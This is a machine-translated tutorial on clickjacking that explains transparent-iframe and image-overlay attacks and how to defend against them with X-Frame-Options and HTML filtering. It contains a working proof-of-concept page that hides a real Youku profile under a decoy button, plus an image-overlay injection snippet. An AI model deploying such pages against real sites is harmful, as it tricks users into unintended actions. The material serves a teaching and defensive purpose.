Click hijacking attack

1、 Attack principle

Clickjacking （Click Jacking）, Also known as UI Covering attacks

         Hackers create a web page using iframe Contains the target site ; Hide the website in the target , Is that users are unaware of the existence of the target website ; Entice the user to click a specific button in the figure . The specific button position is consistent with the key button position in the original web page , The user clicks the button without knowing it , Lured to perform dangerous operations .

2、 attacks  

Two ways ：

• One is that the attacker uses a transparent iframe, Overlay on a web page , Then entice the user to operate on the page , At this time, the user will click the transparent iframe page ;
• Second, the attacker uses a picture to cover the web page , The meaning of blocking the original position of web page .

3、iframe Coverage attack and protection

        iframe The attack is like a picture with a layer of transparent paper on it , The page you see is at the bottom , What you really click on is another web page that is transparent to hackers . A simple example of click hijacking , When you click on an unknown link , Automatically follow someone's blog or subscribe to a video .

If I posted many videos on Youku , Want more people to pay attention to it , So we prepared a page ：

<!DOCTYPE html>
<html>
<meta http-equiv="Content-Type" content="text/html;
charset=utf-8">
<head>
    <title> Clickjacking  POC</title>
    <style>
        iframe {
            width: 1440px;
            height: 900px;
            position: absolute;
            top: -0px;
            left: -0px;
            z-index: 2;
            -moz-opacity: 0;
            opacity: 0;
            filter: alpha(opacity=0);
        }
        button {
            position: absolute;
            top: 270px;
            left: 1150px;
            z-index: 1;
            width: 90px;
            height:40px;
        }
    </style>
</head>
<body>
<button> Beauty pictures </button>
<img src="http://pic1.win4000.com/wallpaper/2018-03-19/5aaf2bf0122d2.jpg">
<iframe src="http://i.youku.com/u/UMjA0NTg4Njcy" scrolling="no"></iframe>
</body>
</html>

Of course, the real page will be more exquisite , Not so simple . 

terms of settlement

Use one HTTP head ——X-Frame-Options.X-Frame-Options It can be said to solve ClickJacking Born , It has three optional values ：

• DENY： The browser will refuse to load any frame page ;
• SAMEORIGIN ：frame The address of the page can only be the page under the same domain name ;
• ALLOW-FROM origin： allow frame Page address loaded ;

nginx To configure ：

add_header X-Frame-Options SAMEORIGIN;

4、 Picture coverage attack and protection

         Image overlay attack （Cross Site Image Overlaying）, The attacker uses one or more pictures , Using pictures of style Or something you can control CSS, Overlay the picture on the web page , Form click hijacking . Of course, the information carried by the picture itself may have the meaning of deception , This does not require the user to click , Can also achieve the purpose of deception .

PS： This kind of attack can easily appear on the page of the website itself .

Example
You can enter HTML Add a picture to the content , Just overwrite the picture in the specified position .

<a href="http://tieba.baidu.com/f?kw=%C3%C0%C5%AE">
    <img src="XXXXXX" style="position:absolute;top:90px;left:320px;" />
</a>

terms of settlement

When defending against image overlay attacks , You need to check the user submitted HTML In the code ,img Labeled style Whether the property may cause a float .

summary ：

Click hijacking is an attack that many people don't pay much attention to , He needs to entice users to interact with the page , The cost of implementing attacks is higher . In addition, developers may feel that users are stupid , Don't pay attention to this kind of attack .